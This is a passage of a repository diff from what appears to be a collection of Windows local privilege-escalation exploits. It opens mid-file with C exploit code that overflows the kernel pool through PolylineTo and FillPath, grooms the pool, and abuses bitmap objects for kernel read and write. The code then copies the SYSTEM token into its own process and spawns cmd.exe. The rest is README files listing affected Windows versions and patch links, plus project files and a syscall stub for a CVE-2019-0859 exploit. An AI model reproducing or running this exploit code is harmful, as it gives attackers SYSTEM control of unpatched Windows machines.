points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
//__debugbreak();
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k = 0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
/*fprintf(stdout, "Printing Bits:\r\n");
for (int i = 1; i < 0x1000; i++) {
fprintf(stdout, "%02x", bits[i]);
}*/
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
//__debugbreak();
SetAddress(addr1);
//__debugbreak();
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
SetAddress(addr1);
WriteToAddress(Gh05);
// get System EPROCESS
ULONG64 SystemEPROCESS = PsInitialSystemProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", SystemEPROCESS);
ULONG64 CurrentEPROCESS = PsGetCurrentProcess();
//__debugbreak();
//fprintf(stdout, "\r\n%x\r\n", CurrentEPROCESS);
ULONG64 SystemToken = 0;
// read token from system process
ReadFromAddress(SystemEPROCESS + gConfig.TokenOffset, (BYTE *)&SystemToken, 0x8);
// write token to current process
ULONG64 CurProccessAddr = CurrentEPROCESS + gConfig.TokenOffset;
SetAddress((BYTE *)&CurProccessAddr);
WriteToAddress((BYTE *)&SystemToken);
// Done and done. We're System :)
system("cmd.exe");
break;
}
if (res == 0) {
fprintf(stderr, "GetBitmapBits failed. %x\r\n", GetLastError());
}
}
//getchar();
//clean up
DeleteObject(bitobj);
DeleteObject(bitmap);
DeleteDC(hMemDC);
ReleaseDC(NULL, hdc);
VirtualFree(0x0000000100000000, 0x100, MEM_RELEASE);
//free(points);
}

23
TestFailure/CVE-2018-0743/README.md
View File

@@ -1,23 +0,0 @@
### CVE-2018-0743
#### 描述
用于Linux的Windows子系统由于在内存中处理对象的方式而存在特权提升漏洞也称为“ Linux特权提升Windows子系统”。
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| -------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64 | 1709 | | |
| Windows Server | | 1709 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0743
```
#### 利用方式
暂无

BIN
TestFailure/CVE-2018-8440/CVE-2018-8440.zip Normal file
View File

Binary file not shown.

6
TestFailure/CVE-2018-8440/README.md
View File

@@ -32,7 +32,11 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [sourceincite](https://github.com/sourceincite/CVE-2018-8440)
#### 分析文章
- https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html

49
TestFailure/CVE-2018-8440/README_EN.md Normal file
View File

@@ -0,0 +1,49 @@
### CVE-2018-8440
#### Describe
An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64 | 1709 | | |
| Windows 10 | x86/x64 | 1803 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [sourceincite](https://github.com/sourceincite/CVE-2018-8440)
#### Analyse
- https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html
- https://blog.0patch.com/2018/09/comparing-our-micropatch-with.html
- https://www.anquanke.com/post/id/169382

BIN
TestFailure/CVE-2019-0859/CVE-2019-0859.zip Normal file
View File

Binary file not shown.

8
TestFailure/CVE-2019-0859/README.md
View File

@@ -29,12 +29,16 @@
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- [Sheisback](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)
#### 分析文章
- https://www.secrss.com/articles/9942

51
TestFailure/CVE-2019-0859/README_EN.md Normal file
View File

@@ -0,0 +1,51 @@
### CVE-2019-0859
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0803
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 10 | x86/x64 | | | |
| Windows 10 | x86/x64 | 1607 | | |
| Windows 10 | x86/x64 | 1703 | | |
| Windows 10 | x86/x64/ARM64 | 1709 | | |
| Windows 10 | x86/x64/ARM64 | 1803 | | |
| Windows 10 | x86/x64/ARM64 | 1809 | | |
| Windows 7 | x86/x64 | | SP1 | |
| Windows 8.1 | x86/x64 | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | x86/x64 | | SP2 | |
| Windows Server 2008 | x86/x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1709 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- [Sheisback](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)
#### Analyse
- https://www.secrss.com/articles/9942
- https://blog.csdn.net/blackorbird/article/details/102462546
- https://www.4hou.com/posts/3jRO
- https://nosec.org/home/detail/2490.html

BIN
TestFailure/CVE-2019-0859/exp.exe
View File

Binary file not shown.

31
TestFailure/CVE-2019-0859/exp.sln
View File

@@ -1,31 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.27703.2018
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "exp", "exp\exp.vcxproj", "{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x64.ActiveCfg = Debug|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x64.Build.0 = Debug|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x86.ActiveCfg = Debug|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Debug|x86.Build.0 = Debug|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x64.ActiveCfg = Release|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x64.Build.0 = Release|x64
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x86.ActiveCfg = Release|Win32
{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {84B731B2-AA7A-4ED9-BE27-C6B2DB02A0B1}
EndGlobalSection
EndGlobal

BIN
TestFailure/CVE-2019-0859/exp/exp.cpp
View File

Binary file not shown.

256
TestFailure/CVE-2019-0859/exp/exp.h
View File

@@ -1,256 +0,0 @@
#pragma once
#include <Windows.h>
#include <tlhelp32.h>
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
typedef struct _HANDLEENTRY {
PVOID phead;
PVOID pOwner;
BYTE bType;
BYTE bFlags;
WORD wUniq;
}HANDLEENTRY, *PHANDLEENTRY;
typedef struct _SERVERINFO {
#ifdef _WIN64
UINT64 dwSRVIFlags;
UINT64 cHandleEntries;
#else
DWORD dwSRVIFlags;
DWORD cHandleEntries;
#endif
WORD wSRVIFlags;
WORD wRIPPID;
WORD wRIPError;
}SERVERINFO, *PSERVERINFO;
typedef struct _SHAREDINFO {
PSERVERINFO psi;
PHANDLEENTRY aheList;
ULONG HeEntrySize;
ULONG_PTR pDispInfo;
ULONG_PTR ulSharedDelta;
ULONG_PTR awmControl;
ULONG_PTR DefWindowMsgs;
ULONG_PTR DefWindowSpecMsgs;
}SHAREDINFO, *PSHAREDINFO;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
// Partial PEB
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PVOID Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PVOID AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ReservedBits0 : 27;
};
ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
ULONG SystemReserved[1];
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
PVOID ReadOnlySharedMemoryBase;
PVOID HotpatchInformation;
PVOID *ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
LARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
SIZE_T HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID *ProcessHeaps;
PVOID GdiSharedHandleTable;
} PEB, *PPEB;
template <class T>
struct LIST_ENTRY_T
{
T Flink;
T Blink;
};
template <class T>
struct UNICODE_STRING_T
{
union
{
struct
{
WORD Length;
WORD MaximumLength;
};
T dummy;
};
T _Buffer;
};
template <class T, class NGF, int A>
struct _PEB_T
{
union
{
struct
{
BYTE InheritedAddressSpace;
BYTE ReadImageFileExecOptions;
BYTE BeingDebugged;
BYTE _SYSTEM_DEPENDENT_01;
};
T dummy01;
};
T Mutant;
T ImageBaseAddress;
T Ldr;
T ProcessParameters;
T SubSystemData;
T ProcessHeap;
T FastPebLock;
T _SYSTEM_DEPENDENT_02;
T _SYSTEM_DEPENDENT_03;
T _SYSTEM_DEPENDENT_04;
union
{
T KernelCallbackTable;
T UserSharedInfoPtr;
};
DWORD SystemReserved;
DWORD _SYSTEM_DEPENDENT_05;
T _SYSTEM_DEPENDENT_06;
T TlsExpansionCounter;
T TlsBitmap;
DWORD TlsBitmapBits[2];
T ReadOnlySharedMemoryBase;
T _SYSTEM_DEPENDENT_07;
T ReadOnlyStaticServerData;
T AnsiCodePageData;
T OemCodePageData;
T UnicodeCaseTableData;
DWORD NumberOfProcessors;
union
{
DWORD NtGlobalFlag;
NGF dummy02;
};
LARGE_INTEGER CriticalSectionTimeout;
T HeapSegmentReserve;
T HeapSegmentCommit;
T HeapDeCommitTotalFreeThreshold;
T HeapDeCommitFreeBlockThreshold;
DWORD NumberOfHeaps;
DWORD MaximumNumberOfHeaps;
T ProcessHeaps;
T GdiSharedHandleTable;
T ProcessStarterHelper;
T GdiDCAttributeList;
T LoaderLock;
DWORD OSMajorVersion;
DWORD OSMinorVersion;
WORD OSBuildNumber;
WORD OSCSDVersion;
DWORD OSPlatformId;
DWORD ImageSubsystem;
DWORD ImageSubsystemMajorVersion;
T ImageSubsystemMinorVersion;
union
{
T ImageProcessAffinityMask;
T ActiveProcessAffinityMask;
};
T GdiHandleBuffer[A];
T PostProcessInitRoutine;
T TlsExpansionBitmap;
DWORD TlsExpansionBitmapBits[32];
T SessionId;
ULARGE_INTEGER AppCompatFlags;
ULARGE_INTEGER AppCompatFlagsUser;
T pShimData;
T AppCompatInfo;
UNICODE_STRING_T<T> CSDVersion;
T ActivationContextData;
T ProcessAssemblyStorageMap;
T SystemDefaultActivationContextData;
T SystemAssemblyStorageMap;
T MinimumStackCommit;
};
typedef _PEB_T<DWORD, DWORD64, 34> PEB32;
typedef _PEB_T<DWORD64, DWORD, 30> PEB64;

179
TestFailure/CVE-2019-0859/exp/exp.vcxproj
View File

@@ -1,179 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{81AC32D3-1CF5-4890-9904-BAA9F9D7230A}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>exp</RootNamespace>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<AdditionalOptions> %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>NotUsing</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<AdditionalOptions> %(AdditionalOptions)</AdditionalOptions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="exp.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="syscall_x64.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="exp.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="syscall_x64.asm">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild>
<FileType>Document</FileType>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

44
TestFailure/CVE-2019-0859/exp/exp.vcxproj.filters
View File

@@ -1,44 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="소스 파일">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="헤더 파일">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="리소스 파일">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>헤더 파일</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>헤더 파일</Filter>
</ClInclude>
<ClInclude Include="syscall_x64.h">
<Filter>소스 파일</Filter>
</ClInclude>
<ClInclude Include="exp.h">
<Filter>헤더 파일</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>소스 파일</Filter>
</ClCompile>
<ClCompile Include="exp.cpp">
<Filter>소스 파일</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="syscall_x64.asm">
<Filter>소스 파일</Filter>
</MASM>
</ItemGroup>
</Project>

4
TestFailure/CVE-2019-0859/exp/exp.vcxproj.user
View File

@@ -1,4 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

BIN
TestFailure/CVE-2019-0859/exp/stdafx.cpp
View File

Binary file not shown.

BIN
TestFailure/CVE-2019-0859/exp/stdafx.h
View File

Binary file not shown.

15
TestFailure/CVE-2019-0859/exp/syscall_x64.asm
View File

@@ -1,15 +0,0 @@
public _DoSyscall
.code
_DoSyscall proc
mov r10, rcx
mov rax, [rsp + 40]
add rsp, 16
syscall
sub rsp, 16
ret
_DoSyscall endp
end

15
TestFailure/CVE-2019-0859/exp/syscall_x64.h
View File

@@ -1,15 +0,0 @@
#pragma once
#include <cstdint>
extern "C" void _DoSyscall();
extern "C" void _GetKernelCallbackTb(PDWORD CallbackTb);
template< typename ReturnType = void, typename... Args,
typename T1 = void*, typename T2 = void*, typename T3 = void*, typename T4 = void* >
ReturnType Syscall(const uint64_t Index, T1 A1 = {}, T2 A2 = {}, T3 A3 = {}, T4 A4 = {}, Args... Arguments)
{
static_assert(sizeof(void*) == 8, "Only x64 is supported.");
return reinterpret_cast< ReturnType(*)(T1, T2, T3, T4, uint64_t, uint64_t, Args...) >(_DoSyscall)(
A1, A2, A3, A4, Index, 0, Arguments... // Stack must be aligned to 16 byte boundary.
);
}

BIN
TestFailure/CVE-2019-0859/exp/targetver.h
View File

Binary file not shown.

118
TestFailure/CVE-2020-17087/README_EN.md Normal file
View File

@@ -0,0 +1,118 @@
### CVE-2020-17087
#### Describe
Windows Kernel Local Elevation of Privilege Vulnerability
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| :------------------ | :--------------- | ------- | ------ | ------ |
| Windows Server 2019 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
